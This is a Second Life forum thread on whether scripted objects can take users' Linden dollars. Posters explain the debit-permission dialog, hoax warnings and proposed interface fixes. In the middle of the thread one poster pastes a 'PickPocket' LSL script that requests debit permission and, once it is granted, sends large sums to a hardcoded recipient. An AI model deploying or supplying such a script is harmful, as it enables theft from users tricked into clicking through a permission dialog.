Can objects really steal your $L?

I keep seeing messages widely distributed in SL that we should beware objects from certain people that will steal your $L. One message went so far as to claim that if you got such an object, you needed to delete it, delete it from your inventory, and even expunge it from your trash or it would keep taking your $L, which sounds like complete hogwash to me.

I've seen some people go so far as to say "Never accept objects from strangers".

My understanding is that, barring a serious bug in LSL functions, an object can't take your money unless it asks for permission to take your $L and you grant that permission.

Does anyone have a solid example where $L were taken by an object, without getting permission first?

I'd hate for people to think that in SL you must never accept an object from a stranger. Better advice is "Beware objects given by strangers", especially in the case where they give it to you without spending some time talking to you and finding out whether you're even interested in what they have to share.

Of course, never say "Yes" to "Allow xxxxx owned by Yyyy Zzz to take your $Lindens?" unless you know who you're dealing with, what the object is supposed to do, why it would take your money, and what to do (whom to contact) if it causes problems. And then, if you leave it in operation, to diligently check your account transactions on the SL website.

Other than that, the most harm a griefer object can do is to animate you (without asking, if you wear it or sit on it), move or teleport you, replace all your attachments, or worst case, start rezzing objects (which will be marked as owned by you, making you look like a griefer). Correct?

BTW, don't assume that if an object's creator is a reputable person that the object is necessarily reputable. I've accidentally made objects that appear to have been created by others, simply because I started with one prim that was another creators' object with copy/mod/xfer permission, and it wound up being the root prim.

This is correct. What is actually happening to the people complaining is this: they get a 'dance bracelet' or similar object. When they wear it, a dialogue asks "this object would like to take money from you, is that ok?" People were expecting a dialogue asking "this object would like to animate you, is that ok?" Some people fail to read exactly what the object is asking, click blindly on 'yes'', and lose their money because of it.

Moral of the story: no, objects cannot 'steal' your money in a strict sense of the word. But you do have to be extra aware when clicking 'yes' or 'accept' in a dialogue, otherwise you may be tricked into giving permission to take your money.

If you let them.

And as Suzy said you may may be tricked into letting them.

//-----------------------------------------------------------------------------------
// PureEvil PickPocket Script C 2005-2007
// By Mitzpatrick Fitzsimmons
//-----------------------------------------------------------------------------------

//----------------------------DISCLAIMER!--------------------------------------------
// This script will take money from the person that owns the object it is in
// ONLY IF that owner accepts the PERMISSION_DEBIT.

// The UUID of the "thief" variable is to whom the money is paid to.
// I accept no responsability for the USE or MISUSE of this script.
// As with anything in SL, make sure you know what you are doing before you do it.
//-----------------------------------------------------------------------------------

key thief = "605dc2e5-3bdf-427e-a38d-98390c124249"; // Insert the key of the person who is going to get the money here.
list ammount = [32768, 16384, 8192, 4096, 2048, 1024, 512, 256, 128, 64, 32, 16, 8, 4, 2 1];


pay () {
integer m = llGetListLength(ammount);
integer i = 0;
while (i<m) {
llGiveMoney(thief,llList2Integer(ammount,i));
i++;
}
}

default
{
on_rez(integer number)
{
llResetScript()
}

state_entry()
{
llSay(0, "Touch the PickPocket!";
}

touch_start(integer total_number)
{
llRequestPermissions(llGetOwner(),PERMISSION_DEBIT );
}

run_time_permissions(integer number)
{
if(number >0)
{
pay();
}else{
llSay(0, "PickPocket has no permissions";
}

}
}

Says it as plain as day...

so now all the nubs have the script handed to them instead of searching for it or figure it out

This leads to a real question

How do you Revoke Permission Debit?

It can only work on your objects right?

But what if its on one of your objects on a parcel you cant access? or an object you cant find.

You can't.

This came up fairly recently, where someone's password was stolen somehow and the attacker left items somewhere in the world that had PERMISSION_DEBIT. Even once the account was reclaimed the items still kept taking money every now and then. I don't know whether it was ever resolved.

There should definitely be an option to revoke any permission in situations like these.

this needs to be looked at then

Also - by defualt your account shouldnt allow any Debits to objects

Its something most users never need, its for business owners, etc.

I wonder if this would be a good project for a new sheep bot... A user could go somewhere in-world and request a search for their objects. The sheep bot would scan the grid and provide them with a list of objects with their names & locations and maybe info like creator/scripted/etc.

That's a good idea - although if the person who was now stealing has the object on his or her own land or island, they could ban the bot from their parcel. The existing sheep bot could do this already.

account protections shouldnt be tied to thrid party activities.

Maybe with a little tweaking. I doubt the current version indexes objects not for sale - there's just too much stuff inworld to do that.

It'd also be nice to secure it somehow - you wouldn't necessarily want other people getting at the results. Maybe when you request the search, it could give you some big random number or something that you have to then give to search.sheeplabs.com to get the results..


You're right - it shouldn't - but if there was some evil object inworld taking your money, you'd probably take whatever you could get.

It does do that already... http://search.sheeplabs.com/core/about/

The default setting is for sale items only, but Opt-In and it lists all items.

I've heard that if an object asks for animation permission and debit permission at the same time, there is a bug that causes only one of those diaglogues to appear, but both to be acted upon. That might be the exploit in question.

Disclaimer: thoroughly untested by me.

Thanks, Warda, that's an interesting possibility to check out. If so, I hope it's HIGH on LL's list of bugs to fix!

As far as I recall they do appear, but both in the same dialogue box, so that if you are used to click "OK" when touching a dance ball you may well miss the second line.

There is another angle to this problem.. a "social engineering virus" or "messaging hoax".

Most of these that I have seen are impossibly ludicrous, including the ones about taking your money whilst in inventory. Generally, they are started by someone who spams a public group or ten with a throwaway alt, telling everyone to pass on the message to every group and person they come across. So, like a pebble dropped into a pond, the wave begins as many groups are spammed repeatedly with the same fake "warning". This causes massive lag in IMs as the IM servers get overloaded with many extra messages containing this warning, which was the aim of the instigator.

Basically, these things used to reside in email, asking people to be good Samaritans and pass them along to everyone in their address book (instead of relying on a trojan program to do it). They are almost always completely bogus, and anyone with any technical background in IT immediately spots them for what they are.

The best thing to do is to nip it in the bud, warning and ejecting folks for becoming part of the problem, and proactively explaining what these things are to your group membership for any of the groups you manage so that they avoid becoming duped.

Just tested, they both appear.
"Take Linden dollars (L$) from you" appears on the top line and is viewable.
But yeah, muscle memory could cause someone to just click.

If the script asks for multiple permissions, the popup says something like this:

XXXX owned by YYYY wants permission to:

    take linden dollars ($) from you
    animate your avatar
    ... etc ...

And you accept or deny all with a single button click.

So, always read the popups carefully!

IMHO, the one about Linden dollars should be bold and in red and flashing or something!

Regards,
Jeff

Oooo.. even better... if the dialog contains a request for debit permission at all, the entire dialog box is red instead of blue.

Can't miss that (well, I suppose color-blind people might, so maybe a big "L$" icon should also appear in it).

I like this idea so much I jira'ed it. VWR-767.

Dang! You beat me to it!

I was planning on putting it in as I was typing it up.

Well, I got the first vote anyway!

Hedgehogs are quicker than dragons, especially ancient ones.

Well-known fact.

Something our Queen would probably agree one, since she is known as the "Great HedgeWyrm".

Of course, speed is irrelevant when one can warp and distort the local space-time continuum.